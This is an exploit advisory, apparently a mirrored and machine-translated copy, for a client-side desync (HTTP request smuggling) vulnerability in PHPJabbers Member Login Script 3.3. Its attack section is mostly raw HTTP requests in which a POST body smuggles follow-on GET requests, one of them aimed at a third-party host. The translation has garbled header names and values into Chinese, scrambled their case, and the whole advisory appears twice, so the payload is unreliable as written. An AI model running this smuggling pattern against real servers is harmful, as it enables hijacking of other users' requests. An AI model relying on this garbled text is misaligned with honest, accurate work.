## title:成员登录脚本3.3-客户端desync
##作者: nu11secur1ty
## date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
##参考: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## Description:
该服务器似乎容易受到客户端DESANC攻击的影响。一个
发表请求已发送到路径'/1692959852_473/index.php'
第二个请求作为尸体发送。服务器忽略了内容长度
标题,没有关闭连接,导致微笑
请求被解释为下一个请求。
状态:高脆弱性
[+] exploit:
````````
POST /1692959852_473/index.php?controller=pjfrontaction=pjactionloadcss
http/1.1
host: demo.phpjabbers.com
Accept-incoding: Gzip,放气
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.97
Safari/537.36
Connection:保持空白
cache-control: max-age=0
cookie: _ga=ga1.2.2.2069938240.1692907228;
_gid=ga1.2.1275975650.1692907228; _gat=1;
_fbp=fb.1.1692907228280.366290059;
_GA_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0;
yellowpages=slk3eokcgmdf0r3t7c020quv35;
PJD=G0I8FCH5JKEBRAAAF2812AFVB5; PJD_1692957219_259=1
升级- 不肯定- requests: 1
sec-ch-ua:'.not/a)品牌'; v='99','google chrome'; v='116','chromium'; v='116'
sec-ch-ua-platform:窗口
sec-ch-ua-mobile:0
内容长度: 1190
content-type:应用程序/x-www-form-urlenceded
get /robots.txt http /1.1
host: demo.phpjabbers.com
Accept-incoding: Gzip,放气
ACCEPT: /
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.97
Safari/537.36
Connection:保持空白
cache-control: max-age=0
get /robots.txt http /2
HOST: www.pornhub.com
Cookie:平台=PC; SS=405039333413129808;
FG_0D2EC4CBD943DF07EC161982A603817E=60256.100000;
FG_9951CE1AC4434B4AC312A1334FA77D82=6902.100000
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-full-version:''
sec-ch-ua-arch:''
sec-ch-ua-platform:''
sec-ch-ua-platform-version:''
sec-ch-ua-model:''
sec-ch-ua-full-vers-list:
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.97
Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve...jabbers/2023/members-login-script-script-3.3)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)
##时间花费:
00:35:00
##作者: nu11secur1ty
## date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
##参考: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## Description:
该服务器似乎容易受到客户端DESANC攻击的影响。一个
发表请求已发送到路径'/1692959852_473/index.php'
第二个请求作为尸体发送。服务器忽略了内容长度
标题,没有关闭连接,导致微笑
请求被解释为下一个请求。
状态:高脆弱性
[+] exploit:
````````
POST /1692959852_473/index.php?controller=pjfrontaction=pjactionloadcss
http/1.1
host: demo.phpjabbers.com
Accept-incoding: Gzip,放气
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.97
Safari/537.36
Connection:保持空白
cache-control: max-age=0
cookie: _ga=ga1.2.2.2069938240.1692907228;
_gid=ga1.2.1275975650.1692907228; _gat=1;
_fbp=fb.1.1692907228280.366290059;
_GA_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0;
yellowpages=slk3eokcgmdf0r3t7c020quv35;
PJD=G0I8FCH5JKEBRAAAF2812AFVB5; PJD_1692957219_259=1
升级- 不肯定- requests: 1
sec-ch-ua:'.not/a)品牌'; v='99','google chrome'; v='116','chromium'; v='116'
sec-ch-ua-platform:窗口
sec-ch-ua-mobile:0
内容长度: 1190
content-type:应用程序/x-www-form-urlenceded
get /robots.txt http /1.1
host: demo.phpjabbers.com
Accept-incoding: Gzip,放气
ACCEPT: /
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.97
Safari/537.36
Connection:保持空白
cache-control: max-age=0
get /robots.txt http /2
HOST: www.pornhub.com
Cookie:平台=PC; SS=405039333413129808;
FG_0D2EC4CBD943DF07EC161982A603817E=60256.100000;
FG_9951CE1AC4434B4AC312A1334FA77D82=6902.100000
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-full-version:''
sec-ch-ua-arch:''
sec-ch-ua-platform:''
sec-ch-ua-platform-version:''
sec-ch-ua-model:''
sec-ch-ua-full-vers-list:
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)
Applewebkit/537.36(Khtml,像壁虎一样)Chrome/116.0.5845.97
Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
````````
##复制:
[HREF](https://github.com/nu11secur1ty/cve...jabbers/2023/members-login-script-script-3.3)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)
##时间花费:
00:35:00